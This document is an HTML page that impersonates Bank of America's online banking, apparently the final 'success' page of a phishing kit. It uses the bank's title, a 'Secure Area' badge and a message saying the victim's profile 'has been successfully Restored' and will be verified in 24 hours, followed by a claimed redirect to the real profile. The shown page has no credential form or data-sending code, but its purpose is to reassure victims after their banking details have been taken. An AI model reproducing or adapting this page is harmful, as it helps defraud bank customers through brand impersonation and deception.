<!DOCTYPE html>
<html lang="en">
<head>
	<title>Bank of America | Online Banking</title>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	
<!--===============================================================================================-->
	<link rel="icon" type="image/png" href="images/favicon.png"/>
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="bootstrap.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="font-awesome.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="icon-font.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="animate.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="hamburgers.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="animsition.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="select2.min.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="daterangepicker.css">
<!--===============================================================================================-->
	<link rel="stylesheet" type="text/css" href="util.css">
	<link rel="stylesheet" type="text/css" href="main.css">
<!--===============================================================================================-->
</head>
<body>
	<div align="center" style="min-width:430px;background-color:#ffffff;">
	<div style="height:98px">
		<div align="left" style="padding-top:18px;padding-left:5%;">
	  <img src="images/assets-images-global-logos.svg" width="250" height="70" alt="">
		<div class="sl-nav">
			<ul>
			<div style="padding-top:10px;">
		 <p><img src="images/locki.svg" width="20" height="20" alt=""> <b style="padding-top:2px;"><font color="gray">Secure Area</font></b></p>
			</div>
			</ul>
		</div>
		</div>
		
	</div>
	<div style="background-color: #dc1431;
	background-image: url('images/ban1.png');
	background-size: 100%;
    border-color: rgba(232, 232, 232, 1);
    border-bottom-width: 1px;
    border-bottom-style: solid;
		color:white;
		height:40px;
    max-height:60px;">
		<div style="float:left;padding-top:5px;padding-left:5%;">
		<h4>Completed</h4>
		</div>
	</div>
	</div>
<div class="login-form" style="padding-left:5%;padding-right:5%;">
    <div class="bs-example"> 
			<div class="alert alert-success alert-dismissible fade show">
			<h3 class="alert-heading"> Your Profile has been successfully Restored</h3>
					<p class="medium restoretitlemini">Now you can enjoy our services, thank you for chosing our trusted service.Your account will be verified in the next 24 hours.</p>
				 
				 <p class="medium restoretitlemini">You are being redirected to your Bank of America profile.<br/>Within 5 seconds.</p>
			<hr>
			</div>
		</div>
</div></br></br></br></br></br></br></br>
		<div class="wrap-contact100">
		

			
		</div>



	<div id="dropDownSelect1"></div>

<!--===============================================================================================-->
	<script src="vendor/jquery/jquery-3.2.1.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/animsition/js/animsition.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/bootstrap/js/popper.js"></script>
	<script src="vendor/bootstrap/js/bootstrap.min.js"></script>
<!--===============================================================================================-->
	<script src="vendor/select2/select2.min.js"></script>
	<script>
		$(".selection-2").select2({
			minimumResultsForSearch: 20,
			dropdownParent: $('#dropDownSelect1')
		});
	</script>
<!--===============================================================================================-->
	<script src="vendor/daterangepicker/moment.min.js"></script>
	<script src="vendor/daterangepicker/daterangepicker.js"></script>
<!--===============================================================================================-->
	<script src="vendor/countdowntime/countdowntime.js"></script>
<!--===============================================================================================-->
	<script src="js/main.js"></script>

</body>
<style>
.footer {
clear: both;
    position: relative;
    height: 200px;
    margin-top: 90px;
  left: 0;
  bottom: 0;
  width: 100%;
  min-width:430px;
  background-color: #f3efea;
  color: white;
  text-align: center;
  display: inline-flex;
}
.footer>div {
flex: 1 0 50%;
padding-right: 15px;
padding-left: 15px;
max-width: 50%;
line-height: 1.2;
}
</style>

<div class="footer">
  <div align="left">
<img src="images/footi.png" style="min-width:363px;max-width:363px;min-height:98px;max-height:98px;">
</div>
</div>
</html>
